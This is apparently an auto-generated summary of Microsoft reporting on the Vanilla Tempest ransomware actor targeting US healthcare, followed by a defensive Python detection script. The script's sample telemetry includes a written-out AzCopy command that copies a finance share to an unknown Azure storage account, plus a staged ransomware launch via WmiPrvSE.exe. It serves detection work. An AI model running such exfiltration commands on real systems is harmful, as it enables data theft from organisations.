September 19, 2024 at 06:24AM
A financially motivated threat actor that Microsoft tracks as Vanilla Tempest has been targeting the healthcare sector in the U.S. with a ransomware strain called INC. The actor is known for a range of tools and techniques, including deploying ransomware payloads through the Windows Management Instrumentation (WMI) Provider Host and staging stolen data with the MEGA synchronization tool; separately, other ransomware groups have been observed exfiltrating data with Azure storage tools. Microsoft Threat Intelligence is actively tracking this activity.
From the meeting notes, I gathered the following key points:
– Microsoft has identified a financially motivated threat actor using a ransomware strain called INC to target the healthcare sector in the U.S. Microsoft Threat Intelligence tracks the actor as Vanilla Tempest (formerly DEV-0832).
– Vanilla Tempest receives hand-offs from GootLoader infections run by the threat actor Storm-0494, then deploys tooling such as the Supper backdoor, the AnyDesk remote monitoring and management (RMM) tool, and the MEGA data synchronization tool. The attackers move laterally over Remote Desktop Protocol (RDP) and use the WMI Provider Host (WmiPrvSE.exe) to launch the INC ransomware payload on targeted hosts.
– The actor has been active since at least July 2022; earlier intrusions hit the education, healthcare, IT, and manufacturing sectors and deployed several different ransomware families.
– The group overlaps with the actor publicly known as Vice Society, which is known for deploying existing ransomware lockers rather than developing its own.
– Separately, ransomware groups such as BianLian and Rhysida have increasingly been observed using Azure Storage Explorer and AzCopy to exfiltrate sensitive data from compromised networks to Azure Blob Storage.
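The three host-side behaviours in the notes above (WmiPrvSE.exe launching a payload, AnyDesk/MEGA appearing on an endpoint, and AzCopy pushing data to an unfamiliar storage account) translate into simple detection logic. The following is an added example written for this summary, not code from Microsoft or any of the research cited: it runs three rules over a handful of constructed, Sysmon-style process-creation events. The event field names, host and user names, the MEGA client binary name, and the storage-account allow-list are all assumptions for the demo. RDP lateral movement is not covered, since that needs logon events rather than process creations.

```python
"""Added example (not from the original page): detection rules for the
Vanilla Tempest / AzCopy tradecraft described in the notes, run over
constructed process-creation records. All names and paths are assumed."""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 style; field names assumed)."""
    host: str
    user: str
    parent_image: str
    image: str
    cmdline: str


# Binaries tied to the tradecraft in the notes. The MEGA client name is an
# assumption for the demo; tune both sets to what your fleet actually runs.
RMM_AND_SYNC_TOOLS = {"anydesk.exe", "megasync.exe"}
# Azure Storage Explorer drives its transfers through a bundled azcopy.exe,
# so watching azcopy.exe covers both tools named in the notes.
AZURE_COPY_TOOLS = {"azcopy.exe"}
# Children of the WMI provider host that live here are treated as expected.
EXPECTED_WMI_CHILD_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Captures the storage-account name from a blob destination URL.
BLOB_URL = re.compile(r'https://([a-z0-9]+)\.blob\.core\.windows\.net[^\s"]*', re.I)


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def wmi_spawned_payload(ev: ProcEvent) -> bool:
    """WmiPrvSE.exe launching a binary outside the system directories: the
    deployment path the notes describe for the INC payload."""
    return (_basename(ev.parent_image) == "wmiprvse.exe"
            and not ev.image.lower().startswith(EXPECTED_WMI_CHILD_DIRS))


def rmm_or_sync_tool(ev: ProcEvent) -> bool:
    """AnyDesk / MEGA execution; noisy on its own, useful when correlated."""
    return _basename(ev.image) in RMM_AND_SYNC_TOOLS


def azure_exfil(ev: ProcEvent, trusted_accounts: set[str]) -> bool:
    """AzCopy pushing data to a storage account the organisation does not own.
    Legitimate backup jobs target known accounts, so the destination account,
    not the tool itself, is the signal."""
    if _basename(ev.image) not in AZURE_COPY_TOOLS:
        return False
    m = BLOB_URL.search(ev.cmdline)
    if m is None:
        return False  # no blob destination on the command line: nothing to judge
    return m.group(1).lower() not in trusted_accounts


def detect(events, trusted_accounts: set[str]):
    """Return (rule, host, image) triples for every event a rule fires on."""
    hits = []
    for ev in events:
        if wmi_spawned_payload(ev):
            hits.append(("wmi_spawned_payload", ev.host, _basename(ev.image)))
        if rmm_or_sync_tool(ev):
            hits.append(("rmm_or_sync_tool", ev.host, _basename(ev.image)))
        if azure_exfil(ev, trusted_accounts):
            hits.append(("azure_exfil", ev.host, _basename(ev.image)))
    return hits


# Constructed sample telemetry; none of these hosts, users or URLs are real.
SAMPLE_EVENTS = [
    ProcEvent("WS01", "DOM\\alice", r"C:\Windows\explorer.exe",
              r"C:\Users\alice\AppData\Local\AnyDesk\AnyDesk.exe", "AnyDesk.exe"),
    ProcEvent("WS01", "DOM\\alice", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    ProcEvent("FS02", "NT AUTHORITY\\NETWORK SERVICE",
              r"C:\Windows\System32\wbem\WmiPrvSE.exe",
              r"C:\Windows\Temp\inc.exe", "inc.exe"),
    # Scheduled backup to the organisation's own storage account: benign.
    ProcEvent("FS02", "DOM\\svc_backup", r"C:\Windows\System32\cmd.exe",
              r"C:\Tools\azcopy.exe",
              'azcopy.exe copy "D:\\Backups" '
              '"https://contosobackup.blob.core.windows.net/nightly?sv=2022-11-02&sig=REDACTED" --recursive'),
    # Same tool, same account, unknown destination: the exfiltration pattern.
    ProcEvent("FS02", "DOM\\svc_backup", r"C:\Windows\System32\cmd.exe",
              r"C:\Tools\azcopy.exe",
              'azcopy.exe copy "D:\\Shares\\Finance" '
              '"https://x7r2stor.blob.core.windows.net/dump?sv=2022-11-02&sig=REDACTED" --recursive'),
]
TRUSTED_STORAGE_ACCOUNTS = {"contosobackup"}  # assumed allow-list

if __name__ == "__main__":
    for rule, host, image in detect(SAMPLE_EVENTS, TRUSTED_STORAGE_ACCOUNTS):
        print(f"{rule:22} {host:6} {image}")
```

The WMI rule deliberately keys on where the child binary lives rather than on its name, because the payload name is the easiest thing for the operator to change; a hit on a user-writable or Temp path under WmiPrvSE.exe is worth a look regardless of what it is called. The AzCopy rule suppresses the trusted backup job but fires on the transfer to the unrecognised account, which is the distinction a SOC needs if AzCopy is already in routine use.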
Let me know if there’s anything specific you’d like to focus on or any additional details you need from the meeting notes.